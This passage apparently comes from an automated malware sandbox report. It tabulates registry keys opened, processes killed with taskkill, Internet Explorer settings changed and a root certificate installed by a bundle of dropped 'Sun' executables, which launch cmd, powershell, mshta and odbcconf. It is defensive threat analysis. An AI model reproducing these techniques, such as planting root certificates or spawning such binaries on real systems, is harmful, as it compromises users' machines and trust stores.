| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1515dbfc0edab0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15132bf2c585337a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-KHILQ.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-L27RA.tmp\Sun15b94526a807b.tmp | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3D7EE991-9DBD-11EF-A641-FE6EB537C9A6} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1585e1028b0.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe | N/A |
